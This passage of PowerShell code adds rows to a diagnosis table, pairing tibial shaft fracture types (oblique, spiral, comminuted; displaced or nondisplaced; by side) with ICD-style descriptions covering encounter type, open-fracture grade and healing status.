unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified tibia","Displaced oblique fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right tibia","Nondisplaced oblique fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left tibia","Nondisplaced oblique fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified tibia","Nondisplaced oblique fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right tibia","Displaced spiral fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left tibia","Displaced spiral fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified tibia","Displaced spiral fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right tibia","Nondisplaced spiral fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left tibia","Nondisplaced spiral fracture of shaft of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified tibia","Nondisplaced spiral fracture of shaft of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right tibia","Displaced comminuted fracture of shaft of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left tibia","Displaced comminuted fracture of shaft of left tibia, initial encounter for closed fracture") + $null = 